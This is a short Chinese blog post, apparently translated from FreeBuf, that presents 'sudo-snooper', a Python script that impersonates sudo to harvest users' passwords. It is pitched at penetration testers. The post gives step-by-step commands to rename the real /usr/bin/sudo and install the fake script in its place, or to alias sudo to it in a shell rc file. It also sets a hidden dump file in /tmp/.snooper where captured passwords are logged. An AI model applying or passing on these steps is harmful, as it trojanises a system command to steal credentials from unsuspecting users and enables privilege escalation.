剑客
关注科技互联网

sudo-snooper:一款伪装成sudo命令的“蜜罐”脚本

sudo-snooper:一款伪装成sudo命令的“蜜罐”脚本

sudo-snooper是一款伪装成sudo命令的“蜜罐”脚本,可以帮助渗透测试人员进行系统密码的获取。

安装步骤

Option 1:在原生sodu的安装位置安装,需要root权限,并把原生sudo程序重命名

# mv /usr/bin/sudo /usr/bin/somename

修改 sudo-snooper.py 参数

dumpdir = "/tmp/.snooper"
dumpfile = "/tmp/.snooper/dump.txt"
sudo = 'sudo'

/usr/bin/sudo中 安装python文件

# install -dm755 sudo-snooper.py /usr/bin/sudo

给予python执行文件权限

Option 2 – alias sudo命令

在当前用户shell中修改.rc文件(可能是 .bashrc .zshrc等

alias sudo=’python3.5 /path/to/sudo-snooper.py’

使用方式

运行后,伪装的sudo会向用户征询正确的密码,然后你可以在 sudo vim /etc/resolv.conf中查看记录下的密码。

下载地址

*本文译者:phper,转载请注明来自FreeBuf.COM

分享到:更多 ()

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址